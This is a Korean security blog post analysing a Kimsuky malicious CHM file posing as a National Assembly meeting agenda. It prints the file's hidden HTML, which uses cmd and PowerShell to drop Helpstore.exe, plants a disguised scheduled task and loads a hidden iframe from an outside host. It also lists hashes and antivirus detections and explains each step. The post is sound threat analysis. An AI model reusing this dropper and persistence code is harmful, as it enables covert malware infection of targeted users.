꿈을꾸는 파랑새

오늘도 우리 이북 오도를 무단 점거를 하는 반국가 단체인 북한 해킹 단체 김수키(Kimsuky) 에서 만든 240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고)2024.8.11에 대해 글을 적어 보겠습니다.대한민국 국회 의사일정 공지를 하나 가져 와서 하려고 한 것을 보니 대충 국회의원과 그 보좌관들을 노린 것이 아닌가 생각이 됩니다.
악성코드 해쉬값
파일명:240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고).chm
사이즈:1.41 MB
MD5:f5f5a585a12df9cb406dde6b3e6da23d
SHA-1:e7197bb5c5363b56a1e33f333e6613f319458d77
SHA-256:3e0f4eaf3db754160f8c012a94772bf05b20823806962836fd0d32e0f160b916
이며 실행시키며 한국어도 아니고 영어도 아니고 일본어도 아닌 것을 즉 깨진 것을 볼 수가 있으며 여기서 파워셀이 실행이 되게 돼 있습니다.
여기서 핵심은 index.html 파일에 있습니다.
이것을 CyberChef(사이버 셰프)로 열면 다음과 같은 내용이 들어가 져 있는 것을 확인할 수가 있습니다.
여기서 Powershell을 실행을 하는 것을 볼 수가 있습니다.

240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고) 악성코드 실행
240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고) 악성코드 실행

HTML 내용

<bgsound src="Helpstore(.)exe">
<OBJECT id =qjswc classid="clsid:adb88(0)a6-d8ff-(1)1cf-(9)377-00aa003b7a11" width=1 height=1 style="display:none;">
<PARAM name = "Command" value="ShortCut">
<PARAM name = "Button" value="Bitmap::shortcut">
<PARAM name = "Item1" value=',cmd(.)exe,/c start /min /b powershell(.)exe -command "If (Test-Path \"$env:TEMP\") { Get-Ch(i)ldItem \"$env:TEMP\" -File | Where(-)Object { $_.Length -eq 159(6)928 } | ForEach-Ob(j)ect { Copy-Item -Pat(h) $_.FullName -Destinat(i)on \"$env:APPDATA\\Helpstore(.)exe\" -Force } }"'>
</OBJECT>

<OBJECT id=oheam classid="clsid:adb(8)80a6-d8ff-11(c)f-9377-0(0)aa003b7a11" width=100 height=100 style="display:none;">
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',cmd(.)exe,/c start /min /b powershell(.)exe -WindowStyle Hidden -Command "schtasks /create /tn \"MicrosoftEdgeUpdateTask\" /tr \"%APPDATA%\Helpstore(.)exe\" /sc ONCE /st (Get-Date).Add(M)inutes(1).ToString(\"HH:mm\")"'>
</OBJECT><scr(i)pt>
qjswc.Click();
oheam.Click();
</script>
<iframe src="hxxp://checker(.)jetos(.)com/l/siCTlD" style="display: none;"></iframe>
</body>
</html>
악성코드 index.html에 포함된 내용
악성코드 index.html에 포함된 내용

코드 분석

1.<bgsound src="Helpstore.exe">:  
웹 페이지에 사운드를 배경으로 재생하려는 것처럼 보이지만 Helpstore(.)exe 라는 파일을 다운로드 또는 실행
2.첫 번째 <OBJECT> 태그:
classid="clsid(:)adb(8)80a6-d(8)ff-11cf-9377-0(0)aa003b7a11":  
classid 는 일반적으로 HTML 도움말 파일(.chm)이나 애플리케이션 인스톨러와 연관된 HTML Application (HTA)
<PARAM name="Item1">:  
PowerShell 명령어를 실행하여 특정 조건을 만족하는 파일을 찾아서 Helpstore(.)exe 라는 파일명으로 %APPDATA% 폴더에 복사
3.두 번째 <OBJECT> 태그:
여기서도 HTA 파일을 실행
PowerShell 명령어:  
schtasks 명령을 사용하여 MicrosoftEdgeUpdateTask 라는 이름의 작업 스케줄러 작업을 생성 해당 작업은 1분 후에 Helpstore.exe를 실행하도록 설정
4.<script> 태그:
자바스크립트를 사용하여 위의 OBJECT 태그에서 정의한 명령들을 실행 사용자 개입 없이 자동으로 실행되게 함
5.<iframe> 태그:
iframe 태그는 사용자에게 보이지 않는 상태로 외부 URL(hxxp://checker(.)jetos(.)com/l/siCTlD)을 로드
2024-08-12 11:32:11 UTC 기준 탐지하는 보안 업체들은 다음과 같습니다.
AliCloud:Exploit:Win/CHM-Downloader.Gyf
ALYac:Trojan.Downloader.CHM
Arcabit:Exploit.CHM-Downloader.Gen [many]
BitDefender:Exploit.CHM-Downloader.Gen
BitDefenderTheta:Gen:NN.ZexaF.36810.HvW@au2xsmoi
Emsisoft:Exploit.CHM-Downloader.Gen (B)
ESET-NOD32:Multiple Detections
Fortinet:HLP/Agent.G2!tr
GData:Exploit.CHM-Downloader.Gen
Google:Detected
Ikarus:Trojan-Downloader.HTML.Agent
Jiangmin:Trojan.Agent.esyn
Kaspersky:HEUR:Trojan.Win32.Agent.gen
Lionic:Trojan.HTML.Agent.4!c
MAX:Malware (ai Score=85)
Microsoft:Trojan:Win32/Wacatac.B!ml
Rising:Trojan.Kryptik@AI.80 (RDML:n3nIL/w0a9qPfBaxpLCrHg)
Sangfor Engine Zero:Trojan.Win32.Kryptik.Vake
Skyhigh (SWG):Artemis!Trojan
Sophos:Mal/Iframe-AN
Symantec:Trojan.Gen.NPE
Tencent:Win32.Trojan.Agent.Rgil
Trellix (HX):Exploit.CHM-Downloader.Gen
TrendMicro:Mal_ChmDr
TrendMicro-HouseCall:Mal_ChmDr
Zillya:Dropper.Agent.Win32.566594
ZoneAlarm by Check Point:HEUR:Trojan.Win32.Agent.gen
그리고 각각 악성코드 해쉬값들은 다음과 같습니다.
240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고):3e0f4eaf3db754160f8c012a94772bf05b20823806962836fd0d32e0f160b916
Helpstore.exe:86ef578ca5923119e65049f3d26bff7ea41cea12f8c425f06786b406c8dfaf9a
index.html:f00852dab6c6540bb6700d4e6ec43d6b61cd149ac395900b8b9eb5670a0be373
그리고 제발 국회의원님이든 보좌관이든 대북 관련 종사자이든 대북 연구자 분들이든 대북 관련 일을 하시는 분들은 흔히 백신 프로그램을 믿고 해당 파일들을 내려받기 및 실행을 할 것인데 여러분의 백신 프로그램(안티바이러스)인 아무리 DB이든 사전 방역이든 간에 한계가 있습니다. 북한 해킹 단체이든 해외 해킹 단체이든 이 인간들은 기본적으로 백신 프로그램에 탐지 안 되게 엄청나게 짱구 굴리고 있습니다. 여러분은 낚으려고 언제나 신선한 키워드를 찾고 이용합니다.
결론 누가 할지 없어서 chm 파일 보내면 그냥 너~열어봐 악성코드 감염시킬 거야 라고 생각하시면 됩니다.윈도우 에서 도움말 파일 및 기타 정보를 저장하는 파일이지만 누가 요즘 도움말 파일을 chm 형태로 열지 않습니다. 여러분이 당장 브라우저에서 F1 키를 눌러 보거나 어느 프로그램에서 F1을 눌러보면 도움말 파일은 해당 공식 사이트로 이동해서 대부분 열게 돼 있습니다.
결론: chm 확장자로 매일 왔다. 99.999% 백신 프로그램에서 탐지 안 해도 악성코드라고 생각하시면 됩니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band